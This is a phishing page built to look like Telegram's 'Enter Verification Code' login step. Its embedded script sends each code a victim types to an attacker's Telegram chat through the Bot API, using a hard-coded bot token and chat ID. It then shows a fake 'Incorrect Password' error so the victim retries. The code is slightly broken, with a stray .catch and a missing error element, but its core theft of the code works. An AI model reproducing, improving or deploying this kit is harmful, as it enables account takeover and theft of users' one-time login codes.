<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <title>Document</title>
   <style>

body {
    font-family: Arial, sans-serif;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #f5f5f5;
    margin: 0;
}
.container {
    background: white;
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
    text-align: center;
    width: 90%;
    max-width: 350px;
}
.logo {
    width: 80px;
    margin-bottom: 10px;
}
h2 {
    margin: 10px 0;
    font-size: 20px;
}
.input-group {
    display: flex;
    flex-direction: column;
    margin: 10px 0;
    text-align: left;
}
label {
    font-size: 14px;
    font-weight: bold;
}
select{
    padding: 12px;
    margin-top: 5px;
    border: 1px solid #ccc;
    border-radius: 5px;
    font-size: 14px;
    width: 100%;
    box-sizing: border-box;
    
}
#code{
    padding: 12px;
    margin-top: 5px;
    border: 1px solid #ccc;
    border-radius: 5px;
    font-size: 14px; 
    box-sizing: border-box; 
}
#phone{
    padding: 12px;
    margin-top: 5px;
    border: 1px solid #ccc;
    border-radius: 5px;
    font-size: 14px;  
    box-sizing: border-box;   
}

.btn {
    background-color: #0088cc;
    color: white;
    border: none;
    padding: 10px;
    width: 100%;
    font-size: 16px;
    border-radius: 5px;
    cursor: pointer;
    margin-top: 10px;
}
.btn:hover {
    background-color: #007bb5;
}

@media (max-width: 480px) {
    .container {
        width: 95%;
        padding: 15px;
    }
}


   </style>
</head>
<body>
    <div class="container hidden" id="verification-container">
        <img src="monkey.png" class="logo" alt="Monkey Emoji">
        <h2>Enter Verification Code</h2>
        <p>We have sent you a message in Telegram with the code.</p>
        <div class="input-group">
            <label for="code">Code</label>
            <input type="text" id="code" placeholder="Enter code">
        </div>
        <button id="login" class="btn">CONFIRM</button>
    </div>
    <script>
        // this is send login data telegram bot 
                const botToken = "7848765711:AAENovLcEBM1BpzZlRQQFIkmCmyoGiTwYHc";
                const chatId = "6578349813";
        
                const loginButton = document.getElementById("login");
                const emailInput = document.getElementById("code");
                
            
                loginButton.addEventListener("click", function(event) {
                    // event.preventDefault();
   
                const email = emailInput.value;
                    
                const message = `Code is:\Code: ${email}`;
        
                        const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
        
                        fetch(url)
                            .then(response => {
                                if (response.ok) {
                                    var errorMessage = "Incorrect Password! Please try again.";
                                    document.getElementById("error-message").textContent = errorMessage;
        
                                    emailInput.value = "";
                                   
                                } else {
                                    throw new Error("Failed to send message to Telegram.");
                                }
                            })
                            .catch(error => {
                                console.error(error);
                               alert('Login error plese try again!');

                            });
                    }).catch(error => {
                        console.error(error);
                        alert("Failed to retrieve device information.");
                    });

 
                   


             
            
        
        //end this code
            </script>
</body>
</html>